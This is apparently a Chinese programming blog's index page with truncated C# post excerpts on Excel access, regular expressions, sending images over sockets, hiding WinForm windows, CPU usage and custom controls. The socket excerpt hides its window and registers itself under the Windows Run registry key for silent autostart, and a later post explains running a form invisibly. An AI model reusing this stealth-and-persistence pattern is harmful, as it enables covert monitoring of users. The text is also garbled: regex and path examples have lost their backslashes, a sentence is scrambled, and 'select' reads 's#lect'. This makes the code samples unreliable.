【C#】 对Excel的操作

这几天为了能在Excel里读写数据,纠结了好几天,不过还是得到了解决: 读取Excel数据: (1)连接Excel文件。 private static DataSet ds; private static OleDbDataAdapter adapter; ///   /// /// ///Excel文件路径 private static void InitExcel(string ExcelPath) { try { string conn = @”Provider=Microsoft.Jet.OLEDB.4.0;Data Source=” + ExcelPath + “;” + “Extended Properties=Excel 8.0”; ds = new DataSet(); adapter = new OleDbDataAdapter(“s#lect * from [Sheet1$]”, conn); adapter.Fill(ds, “tableL”); } catch (Exception e) … Continue reading “【C#】 对Excel的操作”

【C#】 正则表达式

(1)“@”符号 符下两ows表研究室的火热,当晨在“@”虽然并非C#正则表达式的“成员”,但是它经常与C#正则表达式出双入对。“@”表示,跟在它后面的字符串是个“逐字字符串”,不是很好理解,举个例子,以下两个声明是等效的: string x=”D:\My Huang\My Doc”; string y = @”D:My HuangMy Doc”; 事实上,如果按如下声明,C#将会报错,因为“”在C#中用于实现转义,如“n”换行: string x = “D:My HuangMy Doc”; (2)基本的语法字符。 d 0-9的数字 D d的补集(以所以字符为全集,下同),即所有非数字的字符 w 单词字符,指大小写字母、0-9的数字、下划线 W w的补集 s 空白字符,包括换行符n、回车符r、制表符t、垂直制表符v、换页符f S s的补集 . 除换行符n外的任意字符 […] 匹配[]内所列出的所有字符 [^…] 匹配非[]内所列出的字符 下面提供一些简单的示例: string i = “n”; string m = “3”; Regex r = new Regex(@”D”); //同Regex r = … Continue reading “【C#】 正则表达式”

【c#】如何通过socket传输图片

发送端 using Microsoft.Win32; using System.Drawing.Imaging; using System.IO; using System.Net; using System.Net.Sockets; using System.Text; using System.Data.SqlClient; using System.Configuration; using System.Net.NetworkInformation; #endregion /// /// 应用程序的主入口点。 ///   public string StrIp = “”; System.Net.Sockets.Socket sendsocket = new System.Net.Sockets.Socket(System.Net.Sockets.AddressFamily.InterNetwork, System.Net.Sockets.SocketType.Stream, System.Net.Sockets.ProtocolType.Tcp); // *********************************************************************************************最小化托盘 this.Hide(); this.ShowInTaskbar = false; string starupPath = Application.ExecutablePath; RegistryKey loca = Registry.LocalMachine; RegistryKey run = loca.CreateSubKey(“SOFTWARE\Microsoft\Windows\CurrentVersion\Run”); … Continue reading “【c#】如何通过socket传输图片”

【C#】 Winform窗体自动运行隐藏

最近几天都在测试项目距,突然发现winform窗体的隐藏和MFC窗体的隐藏不一样,MFC窗体隐藏只要直接掉类库函数引用就可以了,而winform的却不一样,一开始采用窗体的方法hide,运行时根本就不会隐藏。经过网上查资料:原来可以采用如下方法就可以隐藏. 一:在program.cs文件中:    注:Client为启动的窗口        private static ApplicationContext context;        [STAThread]        static void Main()        {            Application.EnableVisualStyles();            Application.SetCompatibleTextRenderingDefault(false);            Client Dlg = new Client();            Dlg.Size = new System.Drawing.Size(0, 0);            Dlg.Show();            Dlg.Visible = false;            context = new ApplicationContext();            context.ThreadExit += new EventHandler(context_ThreadExit);            Application.Run(context);  //应用程序运行的主程序是context而窗口就相当于一个“副”程序了。(个人理解)        } 二:虽然这样设置,还是会出现窗体显示的一瞬间,但是可以采用窗口的模式为:    FormBorderStyle=None;就可以了。 运行时就会看不到窗体了。

【C#】 WinForm CPU占用过高

原因:程序中因为使用ThreadPool 多线程操作.Form.Invoke 用了很多,造成CPU占用 90%以上,甚至程序假死….. 我一度去掉所有lock数据库操作什么的代码,都没大的改善….. 解决方法: 每次调用完后. 让她睡个300毫秒(System.Threading.Thread.Sleep(300) ,你可以设置更小.) 整个世界清静了,CPU没超过10%.

【C#】 自定义控件(使用组件)

通过自己对C#的学习,特别是在winForm中,让想自己收获很大。如:当你在winForm中使用自定义的控件,若使用自带的控件(拖),会受到很大的限制。只有通过自己代码的创建,运用起来才方便。因此我使用了C#的组件(DLL)专门创建自定义控件。代码如下: internal class MakeListView { private static Form NewForm; private static ListView NewListView; private static ListViewItem lvi; private static bool check=false; public static Form form { set { NewForm = value; } } private static void InitListView() { NewListView = new System.Windows.Forms.ListView(); } public static void CreateListView() { InitListView(); NewListView.Location = new System.Drawing.Point(2, 72); NewListView.Dock … Continue reading “【C#】 自定义控件(使用组件)”